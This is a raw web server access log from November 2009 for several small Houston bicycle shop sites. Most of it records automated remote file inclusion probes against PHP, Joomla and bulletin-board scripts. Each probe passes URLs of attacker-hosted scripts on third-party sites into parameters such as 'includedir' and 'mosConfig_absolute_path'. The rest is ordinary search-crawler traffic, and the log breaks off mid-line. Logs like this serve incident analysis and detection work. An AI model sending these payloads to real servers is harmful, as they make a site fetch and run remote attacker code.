202.123.212.188 - - [12/Nov/2009:20:05:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.75" "houstonbikeshop.com"
202.123.212.188 - - [12/Nov/2009:20:05:27 -0800] "GET /skin/zero_vote/error.php?dir=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.75" "houstonbikeshop.com"
91.121.28.22 - - [12/Nov/2009:20:15:45 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.spisingles.com//orca/classes/en/melambe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [12/Nov/2009:20:15:45 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.spisingles.com//orca/classes/en/melambe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [12/Nov/2009:20:15:45 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.spisingles.com//orca/classes/en/melambe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [12/Nov/2009:20:22:58 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.spisingles.com//orca/classes/en/melambe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET /translations/Spanish.txt///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET /translations/Spanish.txt///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET /translations///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 200 3861 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET /translations///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 200 3861 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET //?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:34:20 -0800] "GET //?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
68.68.107.29 - - [12/Nov/2009:20:44:03 -0800] "GET /logs/access.log HTTP/1.1" 200 501954 "-" "-" "houstonbikeshop.com"
174.143.155.52 - - [12/Nov/2009:20:47:12 -0800] "GET /translations/Spanish.txt%20%20///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.143.155.52 - - [12/Nov/2009:20:47:12 -0800] "GET /translations/Spanish.txt%20%20///?noSet=0&includedir=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
63.174.244.10 - - [12/Nov/2009:20:53:09 -0800] "GET /tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
63.174.244.10 - - [12/Nov/2009:20:53:09 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
63.174.244.10 - - [12/Nov/2009:20:53:10 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
63.174.244.10 - - [12/Nov/2009:20:57:23 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /logs/access.log//write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /logs//write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /logs//write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:20:57:58 -0800] "GET /logs/access.log%20%20//write.php?dir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.15 - - [12/Nov/2009:21:05:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.svbikes.com"
63.174.244.10 - - [12/Nov/2009:21:06:04 -0800] "GET /translations//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
63.174.244.10 - - [12/Nov/2009:21:06:04 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.85 - - [12/Nov/2009:21:11:09 -0800] "GET /bullitinboard/viewtopic.php?p=1970 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
63.174.244.10 - - [12/Nov/2009:21:16:56 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?includedir=http://www.invitedby.me/tr/data/logos/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.69.199.43 - - [12/Nov/2009:21:18:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.69.199.43 - - [12/Nov/2009:21:18:34 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.69.199.43 - - [12/Nov/2009:21:18:34 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.16.231.195 - - [12/Nov/2009:21:34:26 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
84.16.231.195 - - [12/Nov/2009:21:34:26 -0800] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
84.16.231.195 - - [12/Nov/2009:21:34:26 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
67.195.112.85 - - [12/Nov/2009:21:57:35 -0800] "GET /bullitinboard/viewtopic.php?p=12457 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
222.236.47.182 - - [12/Nov/2009:22:18:40 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [12/Nov/2009:22:18:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [12/Nov/2009:22:18:40 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:19:20 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:19:25 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:19:25 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [12/Nov/2009:22:19:40 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:26:53 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:26:53 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:26:53 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:27:13 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [12/Nov/2009:22:30:43 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:22:37:12 -0800] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:22:37:12 -0800] "GET /logs///?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:22:37:12 -0800] "GET /logs/access.log%20%20///?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [12/Nov/2009:22:43:28 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [12/Nov/2009:22:43:28 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [12/Nov/2009:22:43:28 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [12/Nov/2009:22:45:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [12/Nov/2009:22:45:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [12/Nov/2009:22:45:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.54.243 - - [12/Nov/2009:22:49:24 -0800] "GET /ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.54.243 - - [12/Nov/2009:22:49:25 -0800] "GET /logs//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.54.243 - - [12/Nov/2009:22:49:25 -0800] "GET /logs/access.log%20%20//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.107.181 - - [12/Nov/2009:23:17:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
67.205.103.171 - - [12/Nov/2009:23:28:42 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [12/Nov/2009:23:28:50 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [12/Nov/2009:23:28:50 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.138.69.24 - - [12/Nov/2009:23:29:23 -0800] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.1" 200 533 "http://www.currenthealthcare.com/not-expensive-medical-pre-existing-conditions-ins-saving-plan-on-line-cardinal-com-in-new-haven-connecticut.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; AIRF)" "www.svbikes.com"
65.55.107.181 - - [12/Nov/2009:23:31:38 -0800] "GET /riderready/index.html HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
81.19.66.38 - - [12/Nov/2009:23:40:30 -0800] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Nov/2009:23:40:31 -0800] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
74.50.85.15 - - [12/Nov/2009:23:45:25 -0800] "GET /logs/access.log//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:07:09 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:07:09 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:07:09 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:07:09 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:07:39 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:07:39 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:07:39 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:07:47 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:08:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:08:34 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.143.155.52 - - [13/Nov/2009:00:08:34 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:10:48 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [13/Nov/2009:00:11:00 -0800] "GET /translations/Polish.txt/?page=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [13/Nov/2009:00:11:00 -0800] "GET /?page=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [13/Nov/2009:00:11:00 -0800] "GET /translations/?page=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [13/Nov/2009:00:12:22 -0800] "GET /translations/Polish.txt%20%20/?page=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:20:15 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:20:15 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:20:15 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:20:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:22:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:22:25 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:22:25 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [13/Nov/2009:00:22:33 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:08:22 -0800] "GET /index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:08:22 -0800] "GET /logs/access.log//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:08:22 -0800] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:12:33 -0800] "GET /logs/access.log%20%20//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:12:33 -0800] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.221.38 - - [13/Nov/2009:01:12:33 -0800] "GET /index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [13/Nov/2009:01:29:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.114 - - [13/Nov/2009:01:29:51 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.114 - - [13/Nov/2009:01:37:12 -0800] "GET /fit.html HTTP/1.0" 200 17443 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.114 - - [13/Nov/2009:01:37:30 -0800] "GET /?M=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
124.115.6.15 - - [13/Nov/2009:01:52:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "svbikes.com"
70.38.112.174 - - [13/Nov/2009:01:53:50 -0800] "GET /OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [13/Nov/2009:01:53:50 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [13/Nov/2009:01:53:50 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [13/Nov/2009:01:54:45 -0800] "GET /OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [13/Nov/2009:01:54:45 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [13/Nov/2009:01:54:45 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [13/Nov/2009:01:56:50 -0800] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
70.38.112.174 - - [13/Nov/2009:02:01:38 -0800] "GET /logs/access.log//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.3.26.176 - - [13/Nov/2009:02:04:48 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_sys